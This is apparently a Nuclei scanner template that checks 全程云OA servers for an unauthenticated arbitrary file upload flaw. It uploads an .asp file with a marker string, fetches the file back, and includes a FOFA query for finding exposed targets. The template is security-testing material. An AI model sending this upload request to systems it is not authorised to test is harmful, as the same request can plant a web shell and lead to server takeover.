http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - '"fileTargetName":"([a-zA-Z0-9-]+\.asp)"'
          type: regex
      raw:
        - |
          POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
          Content-Type: multipart/form-data; boundary=d0b7a0d40eed0e32904c8017b09eb305

          --d0b7a0d40eed0e32904c8017b09eb305
          Content-Disposition: form-data; name="upload"; filename="{{username}}.asp"
          Content-Type: image/png

          <% Response.Write("pboyjnnrfipmplsukdeczudsefxmywe") %>
          --d0b7a0d40eed0e32904c8017b09eb305--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /OA/upfiles/temp/{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
id: jinchengyunOA-AttachFile_UploadFile-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="images/yipeoplehover.png"
        全程云OA AttachFile/UploadFile 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 全程云OA AttachFile/UploadFile 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486750&idx=1&sn=8ffac414cd3f1a03a1e3a24c40a73de1&chksm=c267b82df510313be211165c5726441b412112e0c7de127b128a394ed2267f351493ee235c1c&token=522460222&lang=zh_CN#rd
    severity: high
    tags:
        - 全程云OA
variables:
    username: '{{to_lower(rand_base(6))}}'
